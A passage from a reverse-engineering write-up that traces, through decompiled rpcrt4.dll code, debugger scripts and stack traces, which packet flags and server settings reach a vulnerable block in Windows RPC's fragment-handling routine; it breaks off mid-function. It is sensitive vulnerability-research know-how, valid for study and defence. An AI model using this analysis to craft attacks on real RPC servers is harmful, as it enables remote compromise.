bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xae3f8
lblset $addr, "OSF_CCALL::ProcessResponse_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xb35fc
lblset $addr, "OSF_SCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "


Running the client, RPCClientTest.exe 1 5000, the execution stops at OSF_SCALL::ProcessReceivedPDU().

wir1


The only vulnerable function touched by the previous test is OSF_SCALL::ProcessReceivedPDU(), and it is reached when the client asks to execute the hello procedure. Now we need to understand what is passed to the function as arguments; just from the name, we can assume the routine is called to process a received Protocol Data Unit.

OSF_SCALL::ProcessReceivedPDU()

To understand how the function is called, and therefore which parameters are passed, we need to analyze the functions in the stack trace. Below is shown how the vulnerable routine was reached in the previous test.

OSF_SCALL::ProcessReceivedPDU(OSF_SCALL *param_1,OSF_SCALL **param_2,byte *param_3,int param_4)
rpcrt4.dll + 0x3ac14 #  OSF_SCALL::BeginRpcCall(longlong *param_1,OSF_SCALL **param_2,OSF_SCALL **param_3)
rpcrt4.dll + 0x3d2ae #  void OSF_SCONNECTION::ProcessReceiveComplete(longlong *param_1,longlong *param_2,OSF_SCALL **param_3,ulonglong param_4)
rpcrt4.dll + 4c99c   #  void DispatchIOHelper(LOADABLE_TRANSPORT *param_1,int param_2,uint param_3,void *param_4, uint param_5,OSF_SCALL **param_6,void *param_7)
other libraries
...


wir2


param1 of OSF_SCALL::ProcessReceivedPDU() should be the class instance that maintains the state of the connection. param2 is just the TCP payload received from the client. param3 could be the TCP length field or the fragment length field; in any case the two seem to be equal every time. param4, at first glance, should be something related to the chosen authentication method.

Unfortunately, it seems that both param2 and param3 are passed straight through DispatchIOHelper(), and as the stack trace shows, DispatchIOHelper() is probably reached in some asynchronous way - maybe a thread waits for messages from clients and starts the dispatcher on every message received.

Before exploring the code I created a .h file containing the DCE RPC data structure in order to have a better view in Ghidra.

 typedef struct
{
    char version_major;
    char version_minor;
    char pkt_type;
    char pkt_flags;
    unsigned int data_repres;
    unsigned short fragment_len;
    unsigned short auth_len;
    unsigned int call_id;
    unsigned int alloc_hint;
    unsigned short cxt_id;
    unsigned short opnum;
    char data[256]; // it should be .fragment_len - 24 bytes long
} dce_rpc_t;

Let’s explore the code to understand better what can be done and under which constraints.

The vulnerable code is the following:


To reach that part of the code some checks have to pass. The branch below must be taken; it is taken every time, and I did not care why at this point.


The following branches should not be taken, so the packet sent should be a REQUEST packet in order to avoid those branches.


It’s required to enter branch at 115 line, this is taken every time, maybe due to authentication.

The branch at line 117 in my tests is never taken.

The branch at line 119 must not be taken, otherwise the data sent are overwritten; to stay out of it, the packet flags byte must not be negative:

    8th bit the highest: Object <-- must be 0
    7th bit            : Maybe
    6th bit            : Did not execute
    5th bit            : Multiplex
    4th bit            : Reserved
    3th bit            : Cancel
    2th bit            : Last fragment
    1th bit            : First fragment

local_res18 is negative only if the highest bit is set, so to avoid that branch the Object flag must not be set.


It’s required to enter in the branch at line 128 so the packet sent should not be the first fragment and so it should not have the first fragment flag enabled. Since my tests until now have been conducted with this code Github, I decided to implement a client using Impacket library it is found here: Github.


Indeed, with the initial test written in C, the al register (BP on base library + 0x3ad0e) containing the packet flags is set to 0x03, i.e. FIRST_FRAG | LAST_FRAG.


On the second packet received with the Impacket client, the al register contains 0, because a middle packet is of course neither the first fragment nor the last.


The branch at line 130 is always taken, while the one at line 134 is never taken with any client. I did not dig into conditions I did not need to bypass.

So, it’s required to force the following conditions :

if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0))


To avoid the branch, this+0x244 must be non-zero and this+0x1cc must be 0. this+0x244 is set to 1 in the function void OSF_SCALL::BeginRpcCall(longlong *param_1,dce_rpc_t *tcp_payl,OSF_SCALL **param_3), at baselibrary+0x8e806.


I focused on the *plVar3 + 0x38 value because *this +0x244 is zeroed every time in ActivateCall(), called from BeginRpcCall().


OSF_SCONNECTION::LookupBinding() just walks a list until it finds the entry matching its second parameter, which corresponds to the context id passed in the DCE RPC packet.

OSF_SBINDING * __thiscall OSF_SCONNECTION::LookupBinding(OSF_SCONNECTION *this,ushort param_1)

{
  OSF_SBINDING *pOVar1;
  SIMPLE_DICT *this_00;
  ulonglong uVar2;
  uint local_res8 [8];
  
  local_res8[0] = 0;
  this_00 = (SIMPLE_DICT *)(this + 0x80);
  uVar2 = (ulonglong)param_1;
  do {
    pOVar1 = (OSF_SBINDING *)SIMPLE_DICT::Next(this_00,local_res8);
    if (pOVar1 == (OSF_SBINDING *)0x0) {
      return (OSF_SBINDING *)0x0;
    }
  } while (*(int *)(pOVar1 + 8) != (int)uVar2);
  return pOVar1;
}


So it gets every item from the list, stored at OSF_CONNECTION instance + 0x80.

void * __thiscall SIMPLE_DICT::Next(SIMPLE_DICT *this,uint *param_1)

{
  void *pvVar1;
  uint uVar2;
  ulonglong uVar3;
  
  uVar2 = *param_1;
  if (uVar2 < *(uint *)(this + 8)) {
    do {
      uVar3 = (ulonglong)uVar2;
      uVar2 = uVar2 + 1;
      pvVar1 = *(void **)(*(longlong *)this + uVar3 * 8);
      *param_1 = uVar2;
      if (pvVar1 != (void *)0x0) {
        return pvVar1;
      }
    } while (uVar2 < *(uint *)(this + 8));
  }
  *param_1 = 0;
  return (void *)0x0;
}


The routine that walks the dictionary reveals the dictionary implementation: it keeps the item count at dictionary+0x8, and every item is just 8 bytes long - in fact a memory address. The second parameter passed to Next() is just a memory address pointing to a value used to check whether the right item has been found during the walk. So in the end the vulnerable code is reached if and only if the address returned from the lookup, i.e. *plVar3 + 0x38, has its second bit set.

BeginRpcCall()
....
      plVar3 = (longlong *)
               OSF_SCONNECTION::LookupBinding((OSF_SCONNECTION *)param_1[0x26],tcp_payl->cxt_id); // get the item
      param_1[0x27] = (longlong)plVar3;
      if (plVar3 != (longlong *)0x0) {
        if ((*(byte *)(*plVar3 + 0x38) & 2) != 0) {
                    /* enter here in order to make param1 + 0x244 != 0 */
          *(undefined4 *)((longlong)param_1 + 0x244) = 1;
....


The chain of structures, from the connection instance down to the structure containing the checked flag that would let us set instance(OSF_SCONNECTION) + 0x244 to 1, is shown below.

typedef struct
{
  ...
  offset 0x130: dictionary_t *dictionary;
  ...
  offset 0x244: uint32_t flag; // must be 1 to enter in vulnerable code block in ProcessReceivedPDU() 
  ... 
} OSF_SCONNECTION_t

typedef struct
{
  ...
  offset 0x80: items_list_t *itemslist;
  ...
}dictionary_t;

typedef struct
{
  offset 0x0: item_t * items[items_no]
  offset 0x8: uint32_t items_no;
  ...
}items_list_t

typedef struct
{
  offset 0x0: flags_check_t *flags;
  ...
}item_t

typedef struct
{
  ...
  offset 0x38: uint32_t flag_checked 
  ...
}


At this point it’s important to understand where it creates the dictionary value and where the value is set. I found that the dictionary address changes every connect. So it should be created on the client connection.

To find where the dictionary is assigned to this[0x26], i.e. in the OSF_SCONNECTION instance, I placed a write breakpoint on the memory address used to store the dictionary address, i.e. this[0x26].

This unveils where the dictionary is inserted into the instance object.


It seems to be created at rpcrt4.dll+0x3668f: OSF_SCALL::OSF_SCALL()


Below the stack trace:

rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()
rpcrt4.dll+0x3620a:OSF_SCONNECTION::OSF_SCONNECTION()
rpcrt4.dll+0xd8e55:WS_NewConnection(CO_ADDRESS *param_1,BASE_CONNECTION **param_2)
rpcrt4.dll+0x4e266:CO_AddressThreadPoolCallback()


LookupBinding(dictionary, item) searches for the item starting from param1+0x80, and there is just one client connecting.


Below, the debugger shows the chain that starts from the connection instance and ends at the flag contained in the item returned from the lookup.


The dictionary is filled with an item that is already instantiated, i.e. with the flag already set, in the OSF_SCONNECTION::ProcessPContextList() routine. Basically, this routine is reached with the following stack:

rpcrt4.dll + 0x3e4f5: SIMPLE_DICT::Insert() 
rpcrt4.dll + 0x39473: OSF_SCONNECTION::ProcessPContextList()
rpcrt4.dll + 0x38b31: OSF_SCONNECTION::AssociationRequested()
rpcrt4.dll + 0x3d3b6: OSF_SCONNECTION::processReceiveComplete()

OSF_SCONNECTION::processReceiveComplete() is called every time a packet arrives from the client. The S in front of the class name means the routine is used by RPC servers.


This routine, OSF_SCONNECTION::ProcessPContextList(), stores the context id in a new dictionary item; from this routine the exact structure of the dictionary items at instance(OSF_SCONNECTION)[0x26] can be recovered. Unfortunately the item, i.e. the structure containing the flag to force, is not initialized on every connection.

Indeed I added a break point on the flag memory address to track the instructions overwriting it. I would expect some free/alloc on every connection just like the dictionary, but this never happened. This led me to think that it should be created during RPC Server initialization.

The item address, i.e. the object that contains the flag to force, is retrieved and set in the dictionary at:

0x57b54 RPC_SERVER::FindInterfaceTransfer()

                           
offset: 0x57a6c | mov rsi,qword ptr ds:[GlobalRpcServer]          ; RSI will contain the address of GlobalRPCServer
offset: 0x57aae | mov rdx,qword ptr ds:[rsi+120]                  ; most likely address of items                
offset: 0x57ab9 | mov rdi,qword ptr ds:[rdx+rax*8]                ; get the ith item       
offset: 0x57b30 | call RPC_INTERFACE::SelectTransferSyntax        ; check if the connection match with the interface                         
offset: 0x57b35 | test eax,eax                                    ; if eax == 0 return, interface/item found! 
offset: 0x57b54 | mov qword ptr ds:[rax],rdi                      ; Address of the item with the flag to force is returned writing it in *rax 

Basically, RPC_SERVER::FindInterfaceTransfer() is called by ProcessPContextList() and is most likely executed to find the RPC interface matching the information sent by the client, for example the uuid value.

Below the debugger view on 0x57b54.


Since GlobalRpcServer is at a fixed address and contains the address of the struct holding the items, I just looked at the write references in Ghidra and found where GlobalRpcServer is filled with the struct address.

wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
  ppwVar24 = (wchar_t **)0x0;
  local_res8[0]._0_4_ = 0;
  ppwVar19 = ppwVar24;
  if (GlobalRpcServer == (RPC_SERVER *)0x0) {
    this = (RPC_SERVER *)AllocWrapper(0x1f0,param_2,param_3);
    ppwVar5 = ppwVar24;
    if (this != (RPC_SERVER *)0x0) {
      param_2 = local_res8;
      ppwVar5 = (wchar_t **)RPC_SERVER::RPC_SERVER(this,(long *)param_2);
      ppwVar19 = (wchar_t **)(ulonglong)(uint)local_res8[0];
    }
    if (ppwVar5 == (wchar_t **)0x0) {
      GlobalRpcServer = (RPC_SERVER *)ppwVar5; 
      return (wchar_t **)0xe;
    }
    GlobalRpcServer = (RPC_SERVER *)ppwVar5; // OFFSET: 0xb3d2; here the global rpc server is set to a new fresh memory.
    ...
  }
  ...
}


The routine InitializeRpcServer() is called from a RpcServerUseProtseqEpW() that is directly called by the RPC server! As shown in the debugger view, *GlobalRpcServer + 0x120 is already filled but *(*GlobalRpcServer + 0x120) is equal to NULL.


Setting a breakpoint on memory write of: *(*GlobalRpcServer + 0x120) , I found where the address of the item is set! Below is shown the stack trace:

rpcrt4.dll + 0x3e4f9 at SIMPLE_DICT::Insert() 
rpcrt4.dll + 0xd498  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
server rpc function 


From the memory contents shown below:


*item + 0x38 appears to be NULL, so let's set a breakpoint on that memory address. To sum up, the flag to force is reachable via:

typedef struct
{
  rpc_interfaces_t **addresses;
}GlobalRpcServer_t;

typedef struct
{
  ...
  offset 0x120:  item_t **items
  ...
}rpc_interfaces_t;

typedef struct
{
  ...
  offset 0x38:  uint32_t flag_checked // Flag check in BeginRpcCall()
  ...
}item_t

It was clear that the flag we want to force had not been set yet, so I set another write breakpoint on *item + 0x38 to find where it is set - and found the point where the flag is modified, as visible in the debugger.


The code that modifies the flag is reached from this stack trace.

rpcrt4.dll + 0xd30e : RPC_INTERFACE::RegisterTypeManager() 
rpcrt4.dll + 0xd1bf : void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e: void RpcServerRegisterIf() 
RPC server functions


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)

{
  ...
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);

  ...
}

void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  if (param_3 != (uint *)0x0) {
    local_80 = param_3;
  }
  local_58 = ZEXT816(0);
  local_78 = param_2;
  local_60 = param_3;
  ...
  puVar6 = RPC_INTERFACE::RegisterTypeManager(pRVar5,local_60,param_4);
  ...
}

RPC_INTERFACE::RegisterTypeManager(RPC_INTERFACE *param_1,undefined4 *param_2,SIZE_T param_3)
{
  ...
  if ((param_2 == (undefined4 *)0x0) ||
     (iVar6 = RPC_UUID::IsNullUuid((RPC_UUID *)param_2), iVar6 != 0)) {
    if ((*(uint *)(param_1 + 0x38) & 1) == 0) {
      *(int *)(param_1 + 200) = *(int *)(param_1 + 200) + 1;
      *(uint *)(param_1 + 0x38) = *(uint *)(param_1 + 0x38) | 1; // SET to 1 the flag!
      *(SIZE_T *)(param_1 + 0x40) = param_3;
      RtlLeaveCriticalSection(pRVar1);
      return (undefined4 *)0x0;
    }
    puVar11 = (undefined4 *)0x6b0;
  }
  ...
}

Looking at the stack trace and the code, it is clear that the RPC server implementation called RpcServerRegisterIf() without specifying any MgrTypeUuid. At this point it still seemed plausible that I could, from the client side, somehow influence the flag that triggers the vulnerable code.

Anyway, back to BeginRpcCall(): to execute the vulnerable code, the item_t flag value must have its second bit set. Since that value is never written at runtime, I could no longer use the debugger to find where that second bit is set. So I searched for instruction patterns based on the information I had:

  1. The value is a bitmask flag; this was clear because the values are checked with TEST instructions and because the value 1 was set with an OR.
  2. item_t is some kind of structure, so the access to the flag member is most likely always of the same form, i.e. [register + 0x38].
  3. The flag is 4 bytes long.

Based on this information I searched for instructions like: or dword ptr [anyreg+0x38], 2


RPC_INTERFACE::RPC_INTERFACE
          (RPC_INTERFACE *this,_RPC_SERVER_INTERFACE *param_1,RPC_SERVER *param_2,uint param_3,
          uint param_4,uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,
          RPCP_INTERFACE_GROUP *param_9)

{
  RPC_INTERFACE *pRVar1;
  int iVar2;
  int iVar3;
  
  *(undefined4 *)(this + 8) = 0;
  RtlInitializeCriticalSectionAndSpinCount(this + 0x10,0);
  *(undefined4 *)(this + 0x38) = 0;
  *(undefined4 *)(this + 200) = 0;
  pRVar1 = this + 0x170;
  *(undefined (**) [16])(this + 0xd8) = (undefined (*) [16])(this + 0xe8);
  *(undefined8 *)(this + 0xe0) = 4;
  *(undefined (*) [16])(this + 0xe8) = ZEXT816(0);
  *(undefined (*) [16])(this + 0xf8) = ZEXT816(0);
  *(undefined4 *)(this + 0x14c) = 0;
  *(undefined4 *)(this + 0x150) = 0;
  *(undefined4 *)(this + 0x154) = 0;
  *(undefined4 *)(this + 0x158) = 0;
  *(undefined4 *)(this + 0x15c) = 0;
  *(undefined4 *)(this + 0x160) = 0;
  *(undefined4 *)(this + 0x164) = 0;
  *(undefined4 *)(this + 0x168) = 0;
  *(undefined4 *)(this + 0x16c) = 0;
  RtlInitializeSRWLock(this + 0x1e0);
  *(RPC_INTERFACE **)(this + 0x178) = pRVar1;
  *(RPC_INTERFACE **)pRVar1 = pRVar1;
  *(undefined4 *)(this + 0x180) = 0;
  *(undefined4 *)(this + 0x1e8) = 0;
  *(undefined (**) [16])(this + 0x1f0) = (undefined (*) [16])(this + 0x200);
  *(undefined8 *)(this + 0x1f8) = 4;
  *(undefined (*) [16])(this + 0x200) = ZEXT816(0);
  *(undefined (*) [16])(this + 0x210) = ZEXT816(0);
  *(undefined4 *)(this + 0x220) = 0;
  *(undefined8 *)(this + 0x228) = 0;
  *(RPC_SERVER **)this = param_2;
  *(undefined8 *)(this + 0xd0) = 0;
  *(undefined8 *)(this + 0xb8) = 0;
  *(undefined8 *)(this + 0x230) = 0;
  *(undefined8 *)(this + 0x238) = 0;
  iVar3 = UpdateRpcInterfaceInformation
                    ((longlong)this,(uint *)param_1,(ushort **)(ulonglong)param_3,param_4,param_5,
                     (longlong)param_6,(ushort **)param_7,(longlong)param_9);
  iVar2 = *(int *)param_1;
  *param_8 = iVar3;
  if ((iVar2 == 0x60) && (((byte)param_1[0x58] & 1) != 0)) {
    *(uint *)(this + 0x38) = *(uint *)(this + 0x38) | 2;
  }
  return this;
}

It seems the OR is executed under certain conditions. This assumption needed verifying, so I set a breakpoint on those conditions, at offset 0xd87c.


rpcrt4.dll + 0xd87c at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xb82e at InitializeRpcServer()
rpcrt4.dll + x      at PerformRpcInitialization()
rpcrt4.dll + y      at RpcServerUseProtseqEpW()


wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
    ...
      this_01 = (RPC_INTERFACE *)
                RPC_INTERFACE::RPC_INTERFACE
                          (this_00,(_RPC_SERVER_INTERFACE *)&DAT_1800e7470,GlobalRpcServer,1,0x4d2,
                           0x1000,(FuncDef2 *)0x0,(void *)0x0,(long *)local_res8,
                           (RPCP_INTERFACE_GROUP *)0x0);
    ...
}

The parameter on which the condition is checked is fixed, i.e. DAT_1800e7470, and is never altered.


But, continuing in the debugger, I hit the same breakpoint again - this time with a different stack trace, one that starts exactly in my RPC server test!


rpcrt4.dll + 0xd87c  at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xd475  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface()
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
RPCServerTest.exe: main

RPC_INTERFACE *
RPC_SERVER::FindOrCreateInterfaceInternal
          (RPC_SERVER *param_1,_RPC_SERVER_INTERFACE *param_2,ulonglong param_3,uint param_4,
          uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,int *param_9,
          RPCP_INTERFACE_GROUP *param_10)

{
...
  pRVar5 = (RPC_INTERFACE *)AllocWrapper(0x240,p_Var8,uVar10);
  uVar2 = (uint)p_Var8;
  this = pRVar9;
  if (pRVar5 != (RPC_INTERFACE *)0x0) {
    p_Var8 = param_2;
    this = (RPC_INTERFACE *)
           RPC_INTERFACE::RPC_INTERFACE
                     (pRVar5,param_2,param_1,(uint)param_3,param_4,param_5,param_6,param_7,param_8,
                      param_10);
    uVar2 = (uint)p_Var8;
  }
...
}


void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  ...
  RtlEnterCriticalSection(param_1);
  pRVar5 = FindOrCreateInterfaceInternal
                       (param_1,(_RPC_SERVER_INTERFACE *)param_2,(ulonglong)param_5,param_6,local_84
                        ,param_8,param_9,(long *)&local_80,(int *)&local_78,local_68);
  ...
}


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)
{
  MUTEX *pMVar1;
  void *in_R9;
  undefined4 in_stack_ffffffffffffffc8;
  undefined4 in_stack_ffffffffffffffcc;
  
                    /* 0x726c0  1483  RpcServerRegisterIf */
  if ((RpcHasBeenInitialized != 0) ||
     (pMVar1 = PerformRpcInitialization
                         ((int)param_1,uuid,(int)param_3,in_R9,
                          (void *)CONCAT44(in_stack_ffffffffffffffcc,in_stack_ffffffffffffffc8)),
     (int)pMVar1 == 0)) {
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);
  }
  return;
}

Basically, that condition failed because of the first parameter my RPC server test application passed to RpcServerRegisterIf().

At this point I looked at my code to see which configuration I had used and how I could change it in my test server app.

API prototype > 
  RPC_STATUS RpcServerRegisterIf(
    RPC_IF_HANDLE IfSpec,
    UUID          *MgrTypeUuid,
    RPC_MGR_EPV   *MgrEpv
  );

My RpcServerRegisterIf call > 
   status = RpcServerRegisterIf(interfaces_v1_0_s_ifspec,
        NULL,
        NULL);

Value of interfaces_v1_0_s_ifspec >
  static const RPC_SERVER_INTERFACE interfaces___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    ,{1,0}},
    ,{2,0}},
    (RPC_DISPATCH_TABLE*)&interfaces_v1_0_DispatchTable,
    0, 
    0,
    0,
    &interfaces_ServerInfo,
    0x04000000 // param_1[0x58]
    };

Of course, the value of interfaces_v1_0_s_ifspec is equal to the one shown in the last debugger image! Since the failing check is done on param_1[0x58] & 1, I changed 0x04000000 to 0x04000001 in order to have the vulnerable code execute.


Note that this is not triggered by the client: in the previous screen the server is just configuring itself, with no client connected. Finally, the check in BeginRpcCall() is satisfied.


Finally, the check inside ProcessReceivedPDU() is satisfied, but the vulnerable code is still not reached because of:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?)
{
    ...
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // not enter here!
            ...
          }
    ...
          else if (pkt_tyoe == 0) { // packet is a request
                    /* should not enter here  */
            if (*(int *)(this + 0x214) == 0) {
            ...
            goto _OSF_SCALL::DispatchRPCCall // that handle the request
            }
            //vulnerable code
          }
          
  ...
}

The problem now is to find under which conditions (this + 0x214) is set. I had already seen that in ActivateCall(), called every time an RPC communication starts, *(this + 0x214) is set to 0; so on the first call that value certainly cannot be anything other than 0.

I decided to dig a bit into the code to better understand how messages are handled. Messages are processed according to the packet type defined in the DCERPC field (Reference) in the routine void OSF_SCONNECTION::ProcessReceiveComplete().

void OSF_SCONNECTION::ProcessReceiveComplete{

  if (pkt_type == 0) { // packet is a request
    if (*(int *)(this + 3) == 0) { // not investigated
        uVar6 = tcp_received->call_id;
        if (*(int *)((longlong)this + 0x17c) < (int)uVar6) { //should enter here if the call id is new, i.e. the packet refer to a new request
          ...
          ppvVar9 = (LPVOID *)OSF_SCALL::OSF_SCALL(puVar11,(longlong)this,(long *)pdVar18); // maybe instantiate the object to represent the call request
          ...
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)ppvVar9,tcp_received,ppOVar20);
          ...
        }
        else{
          ppvVar9 = (LPVOID *)FindCall((OSF_SCONNECTION *)this,uVar6); // the call id has already view in the communication there should be an object, FIND IT!
          if (ppvVar9 == (LPVOID *)0x0) { // not found this is a new call id request, should have first fragment set and not reuse already used call ids?
            uVar6 = tcp_received->call_id;
            if (((int)uVar6 < *(int *)((longlong)this + 0x17c)) ||
               ((tcp_received->pkt_flags & 1U) == 0)) { // should not be 
              uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
              goto reach_fault?;
            }
            goto LAB_18009016d;
          }
call_processReceivedPDU: // call id object found just process new message
          uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)ppvVar9,tcp_received,uVar13,0);
          ...
        }
    }
    else
    {
        uVar6 = tcp_received->call_id;
        if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
          uVar6 = uVar6 >> 0x18 | (uVar6 & 0xff0000) >> 8 | (uVar6 & 0xff00) << 8 | uVar6 << 0x18;
        }
        if ((tcp_received->pkt_flags & 1U) == 0) {
          if (*(int *)((longlong)this + 0x1c) != 0) {
            uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
reach_fault?:
            if (0x95 < uVar6) goto goto_SendFAULT;
            goto LAB_180090122;
          }
        }
        else if (*(int *)((longlong)this + 0x1c) != 0) { // this+0x1c could be a flag true or false that says if the call id is new or not
          REFERENCED_OBJECT::AddReference((longlong)this,plVar15,pdVar18);
          *(undefined4 *)((longlong)this + 0x1c) = 0;
          *(uint *)((longlong)this + 0x17c) = uVar6;
          *(uint *)(this[0xf] + 0x1c8) = uVar6;
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)this[0xf],tcp_received,ppOVar20);
          goto LAB_18003d2b5;
        }
LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
    }
    ...
  }
  ...
  if (tcp_received->pkt_type == '\x0b') { // Executed when the client send a BIND request
      if (this[9] != 0) {
        uVar3 = 0;
        goto LAB_18008ff47;
      }
      iVar4 = AssociationRequested((OSF_SCONNECTION *)this,tcp_received,uVar13,uVar6);
  }
  ...
}

BeginRpcCall() ends up calling ProcessReceivedPDU(), which is the primary function doing the packet-parsing job. ProcessReceivedPDU() when a request arrives with both the first-fragment and last-fragment flags set:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
        *(uint *)(this + 0x1d8) = local_res8[0]; // set the fragment len in the object
        *(char **)pdVar1 = tcp_payload->data;
        tcp_payload = pdVar14;
dispatchRPCCall:
                    /* if last frag set with first frag */
        *(undefined4 *)(this + 0x21c) = 3;
        if (((byte)this[0x2e0] & 4) != 0) {
          LOCK();
          *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
               *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
          *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
        }
        plVar13 = (longlong *)((ulonglong)tcp_payload & 0xffffffffffffff00 | (ulonglong)pkt_tyoe);
LAB_18003ad4f:
        uVar9 = DispatchRPCCall((longlong *)this,plVar13,puVar17); // process the remote call
        return uVar9;
  ...
}

ProcessReceivedPDU() when the first fragment of a request arrives with the last-fragment flag unset:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
          /* it is not the last frag */
          uVar5 = tcp_payload->alloc_hint; // client suggest to the server how many bytes it will need to handle the full request
          if (uVar5 == 0) {
            *(uint *)(this + 0x248) = local_res8[0];
            uVar5 = local_res8[0]; // set to the frag len if alloc hint is 0
          }
          else {
            *(uint *)(this + 0x248) = uVar5;
          }
          puVar17 = (uint *)(ulonglong)uVar5;
      /* Could not allocate more than: (this +0x138)+0x148 = 0x400000 */
          if (*(uint *)(**(longlong **)(this + 0x138) + 0x148) <= uVar5 &&
              uVar5 != *(uint *)(**(longlong **)(this + 0x138) + 0x148)) { // check to avoid possible integer overflow
            piVar11 = local_80;
            uVar18 = 0x1072;
            local_80[0] = 3;
            local_78 = uVar5;
            goto goto_adderror_and_send_fault;
          }
          *(undefined4 *)(this + 0x1d8) = 0;
          pdVar14 = pdVar1;
      /* allocate buffer for all the fragments data */
          lVar7 = GetBufferDo((OSF_SCALL *)tcp_payload->data,(void **)pdVar1,uVar5,0,0, in_stack_ffffffffffffff60);
          if (lVar7 == 0) goto do_;
fail:
          pdVar14 = (dce_rpc_t *)0xe;
          goto cleanupAndSendFault;
  ...
}

long __thiscall
OSF_SCALL::GetBufferDo
          (OSF_SCALL *this,void **param_1,uint len,int param_3,uint param_4,ulong param_5)

{
  long lVar1;
  OSF_SCALL *pOVar2;
  OSF_SCALL *dst;
  ulonglong uVar3;
  OSF_SCALL *local_res8;
  
  local_res8 = this;
  lVar1 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this,&local_res8,len + 0x18);
  if (lVar1 == 0) {
    if (param_3 == 0) {
      *param_1 = local_res8 + 0x18;
    }
    else {
      uVar3 = (ulonglong)param_4;
      dst = local_res8 + 0x18;
      pOVar2 = dst;
      memcpy(dst,*param_1,param_4);
      if ((longlong)*param_1 - 0x18U != 0) {
        BCACHE::Free((ulonglong)pOVar2,(longlong)*param_1 - 0x18U,uVar3);
      }
      *param_1 = dst;
    }
    lVar1 = 0;
  }
  else {
    lVar1 = 0xe;
  }
  return lVar1;
}

If the fragment received is the first but not the last, a new buffer is allocated using the GetBufferDo() routine. The check that the allocation_hint/fragment length cannot be greater than or equal to 0x400000 is interesting: it matters because of the unusual implementation of GetBufferDo(), which allocates len + 0x18 bytes.
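To make the arithmetic concrete, here is a minimal sketch (plain Python, with the 32-bit wrap-around simulated by masking; it is an illustration, not the actual allocator) of why bounding the hint below 0x400000 makes the len + 0x18 addition safe:

MASK32 = 0xFFFFFFFF

def alloc_size(requested_len):
    # GetBufferDo() allocates requested_len + 0x18 bytes; on a 32-bit size
    # this addition wraps if requested_len is close to 0xFFFFFFFF.
    return (requested_len + 0x18) & MASK32

print(hex(alloc_size(0x3FFFFF)))    # 0x400017 -- largest value allowed by the check, no wrap
print(hex(alloc_size(0xFFFFFFF0)))  # 0x8      -- what an unbounded hint could produce: a tiny allocation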

If the packet is not the first fragment and not the last fragment:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
                    /* should enter this branch */
        if (*(void **)pdVar1 != (void *)0x0) {
do_:
          uVar5 = local_res8[0];
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // !RPC_INTERFACE_HAS_PIPES
            if ((*(int *)(this + 0x214) == 0) || (*(int *)(this + 0x1cc) != 0)) {
/* fragment len + current copied */
              uVar5 = local_res8[0] + *(uint *)(this + 0x1d8);
/* alloc_hint <= fragment length  */
              if (*(uint *)(this + 0x248) <= uVar5 && uVar5 != *(uint *)(this + 0x248)) {
                if (*(int *)(this + 0x1cc) != 0) goto LAB_18008ea09;
